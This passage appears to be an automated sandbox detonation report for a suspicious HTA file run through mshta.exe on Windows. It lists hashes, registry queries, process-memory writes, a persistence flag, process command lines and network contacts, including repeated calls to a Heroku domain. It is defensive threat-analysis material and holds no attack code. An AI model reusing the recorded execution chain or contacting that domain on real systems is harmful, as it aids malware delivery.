SHA256 eaea96b587eead61e5229da0311b421d3ca84e4ac38fe4eb863afd551f9f549b
SHA512 d7029ef7d542a34255b41c63e4b5ce9991d9ed09fa192fc4f26b9441a592ae92a513347be2a9b9f4e7c5dc6df909c79fe3a3c0a494d13bd0dcfbf22b7f97be6b

C:\Program Files (x86)\Opera\79.0.4143.22\MEIPreload\preloaded_data.pb

MD5 90d9328facae1a345329249493ac7fb9
SHA1 a246b5e99bf68d64848758998d2541261cf5b665
SHA256 70b61f40a52f41412832f0c2ff043cf0b894c1d0cce3b8aedff14bf3a9d76bb9
SHA512 c490964f67a18c741360ce750013291416af265164b1e255ec8fd863bbeeef2760cba35aedd4aa1a9d751bd521360f3c9b27c4119167d3e81ba553558ab3a02d

C:\Windows\System32\config\systemprofile\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 0a68bb7408224f8c8b3c9e2f6529f681
SHA1 a900259b5e6eda03ceab05c8fe5f8b619e68b37e
SHA256 fcb9bd51f6180e4dea84e38c2dfe1daf49259d99682e16945495bb2729aa69fb
SHA512 12992a665bbe322e66fcc25de96892f2b36e012e64cfd7a134ef9bb6865dde9c0e1554484ea38d0f6185a1c47fcb815d82951d01b7a67894626ee4fe123a9b02

C:\Program Files (x86)\Opera\launcher.exe

MD5 0e6072f8483907dcf73e1de3479a26ea
SHA1 9927b880bc42772fe634718d54026c329b3c4f8e
SHA256 b7f5a33f755ce215251804876eba7d77f4c6fe830d76bf65b1d49e216ee1af8d
SHA512 bbbf13d8808fc1a52be57f856ddc66f1ac1c41d128599c37c02bcfa50e8cf172105b879c07c292da7e1b0f78d23bb4075227d88a84c948c6c1b8407f1c99fbc4

C:\Program Files (x86)\Opera\installer_prefs.json

MD5 aeae8303109bdb468ccd65957efae10f
SHA1 d66872249b8da4225952618f15ce4f8bd02e3aa5
SHA256 a9c55bbf622b592e880159d294d7c37a8845be97a9ccda5c630893f11cec879b
SHA512 805b76f6449dd8bd7a6ed7ab4969ab8a0829d25d1d71d0c9f21d12405ac1d2b97446234bb2c415a55306f5d398c032997286b2283d023af77e82fdc129df275a

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-03 16:46

Reported

2024-05-03 17:02

Platform

win10v2004-20240226-en

Max time kernel

770s

Max time network

722s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2480 wrote to memory of 4352 N/A C:\Windows\system32\OpenWith.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2480 wrote to memory of 4352 N/A C:\Windows\system32\OpenWith.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4352 wrote to memory of 2612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4352 wrote to memory of 2612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4352 wrote to memory of 2612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4352 wrote to memory of 2612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4352 wrote to memory of 2612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4352 wrote to memory of 2612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4352 wrote to memory of 2612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4352 wrote to memory of 2612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4352 wrote to memory of 2612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4352 wrote to memory of 2612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4352 wrote to memory of 2612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 2900 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 2900 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3620 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2612 wrote to memory of 3100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\234e3b771a244355a1fc513d14ed9ecb /t 4848 /p 3220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1316 --field-trial-handle=2280,i,11703952675008463361,17436195144517971517,262144 --variations-seed-version /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\e1f56cc8f69e4e9fa42919543b88f0f3 /t 4008 /p 4988

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Desktop\e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25.hta"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\Desktop\e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25.hta

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.0.1601344451\995602873" -parentBuildID 20221007134813 -prefsHandle 1884 -prefMapHandle 1876 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4cf75be4-c13d-4779-9d22-698773e7098d} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 1964 1953cabe358 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.1.694068521\351072375" -parentBuildID 20221007134813 -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 21565 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {58afc75d-1dd2-4af6-9966-7c3cece65423} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 2388 1953ca0ba58 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.2.139523737\407666641" -childID 1 -isForBrowser -prefsHandle 3344 -prefMapHandle 3340 -prefsLen 21668 -prefMapSize 233444 -jsInitHandle 1428 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {879b10fc-79e1-49f3-9024-284d4907d95e} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 3352 19540b06558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.3.1400687787\715071226" -childID 2 -isForBrowser -prefsHandle 4124 -prefMapHandle 4120 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1428 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f04b2c3-133f-4254-9cc7-c1e18347d0d5} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 4132 19528e65258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.4.1166588329\1534731964" -childID 3 -isForBrowser -prefsHandle 2828 -prefMapHandle 4888 -prefsLen 26381 -prefMapSize 233444 -jsInitHandle 1428 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9817215e-4542-4971-a663-2d5d26dc9357} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 5036 1953fb12858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.5.1803406471\658114221" -childID 4 -isForBrowser -prefsHandle 5052 -prefMapHandle 5048 -prefsLen 26381 -prefMapSize 233444 -jsInitHandle 1428 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {36ba9c3b-14ae-4121-ad32-b9e0cb51ebba} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 4912 19543529558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.6.1619203001\2084739705" -childID 5 -isForBrowser -prefsHandle 5280 -prefMapHandle 5260 -prefsLen 26381 -prefMapSize 233444 -jsInitHandle 1428 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c298f61f-3010-4970-98b3-81ab8000f135} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 4900 19543529858 tab

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\997c94f6315a463bb6a8cca994772961 /t 2544 /p 2240

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2200 --field-trial-handle=2280,i,11703952675008463361,17436195144517971517,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 dwrapper-prod.herokuapp.com udp
IE 54.220.192.176:80 dwrapper-prod.herokuapp.com tcp
US 8.8.8.8:53 176.192.220.54.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
GB 23.44.234.16:80 tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 239.249.30.184.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 dwrapper-prod.herokuapp.com udp
IE 46.137.15.86:80 dwrapper-prod.herokuapp.com tcp
US 8.8.8.8:53 86.15.137.46.in-addr.arpa udp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp
N/A 127.0.0.1:49853 tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 34.117.188.166:443 contile.services.mozilla.com udp
US 8.8.8.8:53 166.188.117.34.in-addr.arpa udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 44.239.14.124:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 124.14.239.44.in-addr.arpa udp
US 8.8.8.8:53 dwrapper-prod.herokuapp.com udp
IE 54.220.192.176:80 dwrapper-prod.herokuapp.com tcp
IE 54.220.192.176:80 dwrapper-prod.herokuapp.com tcp
N/A 127.0.0.1:49860 tcp
US 8.8.8.8:53 dwrapper-prod.herokuapp.com udp
IE 54.220.192.176:80 dwrapper-prod.herokuapp.com tcp
IE 54.220.192.176:80 dwrapper-prod.herokuapp.com tcp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.178.10:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp

Files

C:\Users\Admin\Downloads\_C4WP9C3.hta.part

MD5 dda846a4704efc2a03e1f8392e6f1ffc
SHA1 387171a06eee5a76aaedc3664385bb89703cf6df
SHA256 e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25
SHA512 5cc5ad3fbdf083a87a65be76869bca844faa2d9be25657b45ad070531892f20d9337739590dd8995bca03ce23e9cb611129fe2f8457879b6263825d6df49da7a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs.js

MD5 e7d4909afc2c94f56059c806d27c50fa
SHA1 ca60a53cf2e4236364e6ef1fef320192310d3099
SHA256 549f3db27c895a924a80eb1f13c82e1e27f49bdb5f5d63700a16533733b63843
SHA512 e4c66a66627da5abd668de5b2e60f62769c144c0f4849b3cedefdaba622c2cbdc38184c2ee6e629b18ae6d257d5ea942d1ec52a14cac5c873c1541b6573a254e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\4b5228ca-8e7e-4259-b507-d34c3ccd4fc7

MD5 b0d366f576dbce581ca5c90c07aead32
SHA1 03d825c7f2d032f76c6e69ea01b716e4632425ef
SHA256 24b57e29818f7ae3e868e699561c2cbec95abe046f8e1eb291e8cc931160eac4
SHA512 daad85415382c501c8eed16393994373ca6ee2202263d62c5113539a0a327f0c01418d4121632801a618d0f79593113632fd763a0a9155716ed4d3c7f6afab6d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\50ceb88d-7c23-4e63-937d-7a9f536bf246

MD5 8189751c1ab182b499cb58d7508209fa
SHA1 acd8d3b0d318b7c2f5cccd48dc081bcbed12bd47
SHA256 84b9e280a3bfc8e6f418dbf24a522fa1093ebb55e31ea91721bbdb2fcd1f4399
SHA512 742874abbff41ad5f820225f85369fa2ce8117e8307b368676f084222dea424ca382ab2c02cb1fbe4dd6d1675ad992951750ecdcb6132232e292d88553fce8e0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\db\data.safe.bin

MD5 ec23eac07041bd8c1afcb6c85917d689
SHA1 6763f60665d9bda6b42695cc1ebf20b9182a051f
SHA256 cdfdb2f045c411174e547e4f2f0a9894c7a176cf650f76e953283816ae66277b
SHA512 a6a9155b94dc37d7cebad05c0f1a5b89140f310e8af4e614a6fb9fb15f543454dfb8b170386728b687c5cbbf8b749ea952f01f02e32287a2a48cc92d44b5113a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js

MD5 c550d5cfefeb8a7ae363d5465063bd91
SHA1 9558d93cda78b98e35c1beb6ef064133a484b856
SHA256 5b88a48931cbe988ed2524217eaa76c6e3caf8c4773e33cb510df36d77cb8b1c
SHA512 637a00c986a79ef79d1cc688ef32c31d036f17f1d51d6d355c763fc6880ae217768c90e1fb3448d4c9a341784c9fd9b1c0ccf6ad279d3b15b5961d87f5eeb05d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 b01efd0877d8bb4a5d754d6d5a5922cf
SHA1 6dfaecd4219afbb206185171c64c777e9c73ae21
SHA256 ef1ebedd446ce18b79317f09953ff8a6069f92749188b45945567c315388aa90
SHA512 6f5fce89b6dc7e6979fdb01493c0811bcd55cb945d7665cd9a23e93419a5aa28207b3f614461103f04b0406741e8020c35252fda5529e41e3e918e42fd89c086

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js

MD5 eec82150f8d82ecf35f6de38800554c2
SHA1 07446882a5d73d95137b14f183862da3f63c131c
SHA256 58d4ce7fba60a021ad1979d9ff105a6831f2d89ee4f05859e094d05f72e79158
SHA512 8354f47a7a9b57f2b92d557ec5795407c7a1a95f730de2a94fd576a9c569d131b03e237aa989fff4fbd9297fa1a6c4a8072aaf8b4d053110ddbb5e466bf75411

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore.jsonlz4

MD5 69468c263ec2c10ed2c767e25d248e11
SHA1 eeb6d428b7afa171075a23183ae28e240b6a6127
SHA256 109dcd5c3442e8c5e38e9ab61ba8b6fdd75d17f6a855aad009d35bec429760a7
SHA512 2877797fa825e2bde4135a56b67b372b06756cc6e36191725bcd29d324072d5f025badaed4706a48b77a963a153cc2f8bb6b500de630350c727db315c9281f9e